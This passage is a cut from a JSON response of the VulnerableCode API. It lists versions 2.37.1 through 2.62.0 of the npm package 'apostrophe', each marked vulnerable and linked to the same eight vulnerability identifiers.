7.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268566?format=json","purl":"pkg:npm/apostrophe@2.37.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.37.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268567?format=json","purl":"pkg:npm/apostrophe@2.37.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.37.2"},{"url":"http://public2.vulnerablecode.io/api/packages/268568?format=json","purl":"pkg:npm/apostrophe@2.38.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.38.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268569?format=json","purl":"pkg:npm/apostrophe@2.39.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.39.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268570?format=json","purl":"pkg:npm/apostrophe@2.39.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.39.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268571?format=json","purl":"pkg:npm/apostrophe@2.39.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.39.2"},{"url":"http://public2.vulnerablecode.io/api/packages/268572?format=json","purl":"pkg:npm/apostrophe@2.40.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.40.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268573?format=json","purl":"pkg:npm/apostrophe@2.41.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.41.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268574?format=json","purl":"pkg:npm/apostrophe@2.42.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.42.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268575?format=json","purl":"pkg:npm/apostrophe@2.42.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.42.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268576?format=json","purl":"pkg:npm/apostrophe@2.43.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.43.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268577?format=json","purl":"pkg:npm/apostrophe@2.44.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.44.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268578?format=json","purl":"pkg:npm/apostrophe@2.45.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.45.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268579?format=json","purl":"pkg:npm/apostrophe@2.46.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.46.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268580?format=json","purl":"pkg:npm/apostrophe@2.46.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.46.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268581?format=json","purl":"pkg:npm/apostrophe@2.47.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.47.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268582?format=json","purl":"pkg:npm/apostrophe@2.48.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.48.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268583?format=json","purl":"pkg:npm/apostrophe@2.49.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.49.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268584?format=json","purl":"pkg:npm/apostrophe@2.50.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.50.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268585?format=json","purl":"pkg:npm/apostrophe@2.51.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.51.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268586?format=json","purl":"pkg:npm/apostrophe@2.51.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.51.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268587?format=json","purl":"pkg:npm/apostrophe@2.52.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.52.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268588?format=json","purl":"pkg:npm/apostrophe@2.53.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.53.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268589?format=json","purl":"pkg:npm/apostrophe@2.54.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.54.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268590?format=json","purl":"pkg:npm/apostrophe@2.54.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.54.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268591?format=json","purl":"pkg:npm/apostrophe@2.54.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.54.2"},{"url":"http://public2.vulnerablecode.io/api/packages/268592?format=json","purl":"pkg:npm/apostrophe@2.54.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.54.3"},{"url":"http://public2.vulnerablecode.io/api/packages/268593?format=json","purl":"pkg:npm/apostrophe@2.55.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.55.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268594?format=json","purl":"pkg:npm/apostrophe@2.55.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.55.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268595?format=json","purl":"pkg:npm/apostrophe@2.55.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.55.2"},{"url":"http://public2.vulnerablecode.io/api/packages/268596?format=json","purl":"pkg:npm/apostrophe@2.56.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.56.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268597?format=json","purl":"pkg:npm/apostrophe@2.57.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.57.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268598?format=json","purl":"pkg:npm/apostrophe@2.57.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.57.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268599?format=json","purl":"pkg:npm/apostrophe@2.57.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.57.2"},{"url":"http://public2.vulnerablecode.io/api/packages/268600?format=json","purl":"pkg:npm/apostrophe@2.58.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.58.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268601?format=json","purl":"pkg:npm/apostrophe@2.59.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.59.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268602?format=json","purl":"pkg:npm/apostrophe@2.59.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.59.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268603?format=json","purl":"pkg:npm/apostrophe@2.60.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.60.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268604?format=json","purl":"pkg:npm/apostrophe@2.60.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.60.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268605?format=json","purl":"pkg:npm/apostrophe@2.60.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.60.2"},{"url":"http://public2.vulnerablecode.io/api/packages/268606?format=json","purl":"pkg:npm/apostrophe@2.60.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.60.3"},{"url":"http://public2.vulnerablecode.io/api/packages/268607?format=json","purl":"pkg:npm/apostrophe@2.60.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.60.4"},{"url":"http://public2.vulnerablecode.io/api/packages/268608?format=json","purl":"pkg:npm/apostrophe@2.61.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.61.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268609?format=json","purl":"pkg:npm/apostrophe@2.62.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"V